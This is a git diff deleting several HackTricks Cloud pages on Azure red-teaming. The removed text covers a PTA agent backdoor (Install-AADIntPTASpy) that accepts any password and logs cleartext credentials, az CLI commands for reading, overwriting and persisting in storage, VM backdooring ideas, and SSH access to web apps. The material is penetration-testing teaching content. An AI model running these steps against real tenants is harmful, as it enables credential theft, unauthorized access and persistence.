-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md deleted file mode 100644 index d84673358..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md +++ /dev/null @@ -1,100 +0,0 @@ -# Az - PTA - Pass-through Authentication - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**. - -In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS. - -The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC). - -### Authentication flow - -
- -1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password** -2. The **credentials** are **encrypted** and set in a **queue** in Azure AD -3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.** -4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user. - -{% hint style="warning" %} -If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\ -He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key). -{% endhint %} - -### On-Prem -> cloud - -If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication): - -```powershell -Install-AADIntPTASpy -``` - -{% hint style="info" %} -If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). -{% endhint %} - -It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed: - -```powershell -Get-AADIntPTASpyLog -DecodePasswords -``` - -This backdoor will: - -* Create a hidden folder `C:\PTASpy` -* Copy a `PTASpy.dll` to `C:\PTASpy` -* Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process - -{% hint style="info" %} -When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed. -{% endhint %} - -### Cloud -> On-Prem - -{% hint style="danger" %} -After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.** -{% endhint %} - -### Seamless SSO - -It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in: - -{% content-ref url="seamless-sso.md" %} -[seamless-sso.md](seamless-sso.md) -{% endcontent-ref %} - -## References - -* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta) -* [https://aadinternals.com/post/on-prem\_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md deleted file mode 100644 index d8149527a..000000000 --- a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md deleted file mode 100644 index e7c185893..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md +++ /dev/null @@ -1,59 +0,0 @@ -# Az - Queue Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Queue - -For more information check: - -{% content-ref url="../az-services/az-queue-enum.md" %} -[az-queue-enum.md](../az-services/az-queue-enum.md) -{% endcontent-ref %} - -### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` - -This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. - -{% code overflow="wrap" %} -```bash -az storage queue create --name --account-name - -az storage queue metadata update --name --metadata key1=value1 key2=value2 --account-name - -az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name -``` -{% endcode %} - -## References - -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md deleted file mode 100644 index 196d5ebf4..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md +++ /dev/null @@ -1,72 +0,0 @@ -# Az - Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage Privesc - -For more information about storage check: - -{% content-ref url="../az-services/az-storage.md" %} -[az-storage.md](../az-services/az-storage.md) -{% endcontent-ref %} - -### Common tricks - -* Keep the access keys -* Generate SAS - * User delegated are 7 days max - -### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write - -These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information. - -{% code overflow="wrap" %} -```bash -az storage account blob-service-properties update \ - --account-name \ - --enable-container-delete-retention true \ - --container-delete-retention-days 100 -``` -{% endcode %} - -### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action - -These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information. - -{% code overflow="wrap" %} -```bash -az storage blob service-properties delete-policy update \ - --account-name \ - --enable true \ - --days-retained 100 -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - diff --git a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md deleted file mode 100644 index 5f67c2b12..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# Az - VMs Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## VMs persistence - -For more information about VMs check: - -{% content-ref url="../az-services/vms/" %} -[vms](../az-services/vms/) -{% endcontent-ref %} - -### Backdoor VM applications, VM Extensions & Images - -An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed. - -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc)) -* Backdooring the **User Data** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md deleted file mode 100644 index d63a1375f..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md +++ /dev/null @@ -1,71 +0,0 @@ -# Az - Blob Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage Privesc - -For more information about storage check: - -{% content-ref url="../az-services/az-storage.md" %} -[az-storage.md](../az-services/az-storage.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read - -A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**. - -```bash -# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read -az storage blob list \ - --account-name \ - --container-name --auth-mode login - -az storage blob download \ - --account-name \ - --container-name \ - -n file.txt --auth-mode login -``` - -### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write - -A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob): - -```bash -# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write -az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite -``` - -### \*/delete - -This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md deleted file mode 100644 index 648443c17..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md +++ /dev/null @@ -1,74 +0,0 @@ -# Az - File Share Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## File Share Post Exploitation - -For more information about file shares check: - -{% content-ref url="../az-services/az-file-shares.md" %} -[az-file-shares.md](../az-services/az-file-shares.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read - -A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**. - -```bash -# List files inside an azure file share -az storage file list \ - --account-name \ - --share-name \ - --auth-mode login --enable-file-backup-request-intent - -# Download an specific file -az storage file download \ - --account-name \ - --share-name \ - --path \ - --dest /path/to/down \ - --auth-mode login --enable-file-backup-request-intent -``` - -### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action - -A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share): - -```bash -az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite -``` - -### \*/delete - -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md deleted file mode 100644 index 8069be143..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# Az - Function Apps Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Funciton Apps Post Exploitaiton - -For more information about function apps check: - -{% content-ref url="../az-services/az-function-apps.md" %} -[az-function-apps.md](../az-services/az-function-apps.md) -{% endcontent-ref %} - -{% hint style="danger" %} -**Function Apps post exploitation tricks are very related to the privilege escalation tricks** so you can find all of them there: -{% endhint %} - -{% content-ref url="../az-privilege-escalation/az-functions-app-privesc.md" %} -[az-functions-app-privesc.md](../az-privilege-escalation/az-functions-app-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md deleted file mode 100644 index 0eb9a3592..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md +++ /dev/null @@ -1,90 +0,0 @@ -# Az - Table Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Table Storage Post Exploitation - -For more information about table storage check: - -{% content-ref url="../az-services/az-table-storage.md" %} -[az-table-storage.md](../az-services/az-table-storage.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read - -A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**. - -```bash -# List tables -az storage table list --auth-mode login --account-name - -# Read table (top 10) -az storage entity query \ - --account-name \ - --table-name \ - --auth-mode login \ - --top 10 -``` - -### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action - -A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it). - -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions. -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries - -```bash -# Add -az storage entity insert \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Replace -az storage entity replace \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Update -az storage entity merge \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" -``` - -### \*/delete - -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md deleted file mode 100644 index 92ecc5e14..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md +++ /dev/null @@ -1,67 +0,0 @@ -# Az - App Services Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Services - -For more information about Azure App services check: - -{% content-ref url="../az-services/az-app-services.md" %} -[az-app-services.md](../az-services/az-app-services.md) -{% endcontent-ref %} - -### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read, - -These permissions allows to call the following commands to get a **SSH shell** inside a web app - -* Direct option: - -```bash -# Direct option -az webapp ssh --name --resource-group -``` - -* Create tunnel and then connect to SSH: - -{% code overflow="wrap" %} -```bash -az webapp create-remote-connection --name --resource-group - -## If successfull you will get a message such as: -#Verifying if app is running.... -#App is running. Trying to establish tunnel connection... -#Opening tunnel on port: 39895 -#SSH is available { username: root, password: Docker! } - -## So from that machine ssh into that port (you might need generate a new ssh session to the jump host) -ssh root@127.0.0.1 -p 39895 -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
